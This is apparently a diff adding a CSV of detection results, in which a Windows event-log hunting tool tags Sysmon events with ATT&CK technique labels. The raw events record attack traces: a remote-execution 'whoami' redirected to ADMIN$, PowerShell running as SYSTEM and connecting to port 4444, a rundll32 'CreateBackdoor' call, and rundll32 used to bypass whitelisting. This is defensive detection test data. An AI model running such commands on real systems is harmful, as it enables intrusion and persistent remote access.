+    <Data Name=""CommandLine"">cmd.exe /Q /c whoami /all 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1</Data>
+    <Data Name=""CurrentDirectory"">C:\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-B0F2-5CC8-0000-00203D311D00</Data>
+    <Data Name=""LogonId"">0x1d313d</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-B0C0-5CC8-0000-001017C31C00</Data>
+    <Data Name=""ParentProcessId"">836</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (NT AUTHORITY\SYSTEM) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.18 ) to hostname (  ) , IP ( 10.0.2.19 ) and port ( 4444 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>3</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>3</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-30T20:26:54.152964Z"">
+    </TimeCreated>
+    <EventRecordID>9813</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1964"" ThreadID=""1568"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-04-30 20:26:52.794</Data>
+    <Data Name=""ProcessGuid"">365ABB72-AF8C-5CC8-0000-001003361900</Data>
+    <Data Name=""ProcessId"">2484</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""Protocol"">tcp</Data>
+    <Data Name=""Initiated"">true</Data>
+    <Data Name=""SourceIsIpv6"">false</Data>
+    <Data Name=""SourceIp"">10.0.2.18</Data>
+    <Data Name=""SourceHostname"">IEWIN7</Data>
+    <Data Name=""SourcePort"">49160</Data>
+    <Data Name=""SourcePortName""></Data>
+    <Data Name=""DestinationIsIpv6"">false</Data>
+    <Data Name=""DestinationIp"">10.0.2.19</Data>
+    <Data Name=""DestinationHostname""></Data>
+    <Data Name=""DestinationPort"">4444</Data>
+    <Data Name=""DestinationPortName""></Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 url.dll,OpenURL ms-browser://)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-01-14T20:46:43.237922Z"">
+    </TimeCreated>
+    <EventRecordID>340</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1840"" ThreadID=""8032"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-01-14 20:46:43.232</Data>
+    <Data Name=""ProcessGuid"">747F3D96-28B3-5E1E-0000-00101DF17B00</Data>
+    <Data Name=""ProcessId"">3412</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 url.dll,OpenURL ms-browser://</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-28B3-5E1E-0000-002057EB7B00</Data>
+    <Data Name=""LogonId"">0x7beb57</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-28B3-5E1E-0000-0010CAEC7B00</Data>
+    <Data Name=""ParentProcessId"">1632</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1618950794.242705,2021-04-21T00:33:14.242705+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-04-20T20:33:13.741579Z"">
+    </TimeCreated>
+    <EventRecordID>578503</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3392"" ThreadID=""4112"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2021-04-20 20:33:13.680</Data>
+    <Data Name=""ProcessGuid"">747F3D96-3A89-607F-0000-001028587700</Data>
+    <Data Name=""ProcessId"">4912</Data>
+    <Data Name=""Image"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Host Process for Windows Services</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">svchost.exe</Data>
+    <Data Name=""CommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-82AE-607F-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69</Data>
+    <Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""ParentProcessId"">612</Data>
+    <Data Name=""ParentImage"">?</Data>
+    <Data Name=""ParentCommandLine"">?</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-01-14T20:46:43.237922Z"">
+    </TimeCreated>
+    <EventRecordID>340</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1840"" ThreadID=""8032"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-01-14 20:46:43.232</Data>
+    <Data Name=""ProcessGuid"">747F3D96-28B3-5E1E-0000-00101DF17B00</Data>
+    <Data Name=""ProcessId"">3412</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 url.dll,OpenURL ms-browser://</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-28B3-5E1E-0000-002057EB7B00</Data>
+    <Data Name=""LogonId"">0x7beb57</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-28B3-5E1E-0000-0010CAEC7B00</Data>
+    <Data Name=""ParentProcessId"">1632</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-01-14T20:46:43.237922Z"">
+    </TimeCreated>
+    <EventRecordID>340</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1840"" ThreadID=""8032"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-01-14 20:46:43.232</Data>
+    <Data Name=""ProcessGuid"">747F3D96-28B3-5E1E-0000-00101DF17B00</Data>
+    <Data Name=""ProcessId"">3412</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 url.dll,OpenURL ms-browser://</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-28B3-5E1E-0000-002057EB7B00</Data>
+    <Data Name=""LogonId"">0x7beb57</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-28B3-5E1E-0000-0010CAEC7B00</Data>
+    <Data Name=""ParentProcessId"">1632</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1597237536.555348,2020-08-12T17:05:36.555348+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\SYSTEM32\cmd.exe /c &quot;&quot;C:\Program Files\Npcap\CheckStatus.bat&quot;&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-08-12T13:05:20.029483Z"">
+    </TimeCreated>
+    <EventRecordID>342406</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3344"" ThreadID=""4176"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-08-12 13:05:14.798</Data>
+    <Data Name=""ProcessGuid"">747F3D96-E90A-5F33-0000-0010863C0100</Data>
+    <Data Name=""ProcessId"">1740</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">C:\Windows\SYSTEM32\cmd.exe /c &quot;&quot;C:\Program Files\Npcap\CheckStatus.bat&quot;&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-E909-5F33-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-E90A-5F33-0000-00102CF20000</Data>
+    <Data Name=""ParentProcessId"">1180</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766825.513362,2020-03-21T09:00:25.513362+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.499077Z"">
+    </TimeCreated>
+    <EventRecordID>243562</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:25.488</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-00105B9A2000</Data>
+    <Data Name=""ProcessId"">2028</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-01-14T20:46:43.237922Z"">
+    </TimeCreated>
+    <EventRecordID>340</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1840"" ThreadID=""8032"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-01-14 20:46:43.232</Data>
+    <Data Name=""ProcessGuid"">747F3D96-28B3-5E1E-0000-00101DF17B00</Data>
+    <Data Name=""ProcessId"">3412</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 url.dll,OpenURL ms-browser://</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-28B3-5E1E-0000-002057EB7B00</Data>
+    <Data Name=""LogonId"">0x7beb57</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-28B3-5E1E-0000-0010CAEC7B00</Data>
+    <Data Name=""ParentProcessId"">1632</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-01-14T20:46:43.237922Z"">
+    </TimeCreated>
+    <EventRecordID>340</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1840"" ThreadID=""8032"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-01-14 20:46:43.232</Data>
+    <Data Name=""ProcessGuid"">747F3D96-28B3-5E1E-0000-00101DF17B00</Data>
+    <Data Name=""ProcessId"">3412</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 url.dll,OpenURL ms-browser://</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-28B3-5E1E-0000-002057EB7B00</Data>
+    <Data Name=""LogonId"">0x7beb57</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-28B3-5E1E-0000-0010CAEC7B00</Data>
+    <Data Name=""ParentProcessId"">1632</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.513362,2020-03-21T09:00:25.513362+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.499077Z"">
+    </TimeCreated>
+    <EventRecordID>243562</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:25.488</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-00105B9A2000</Data>
+    <Data Name=""ProcessId"">2028</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
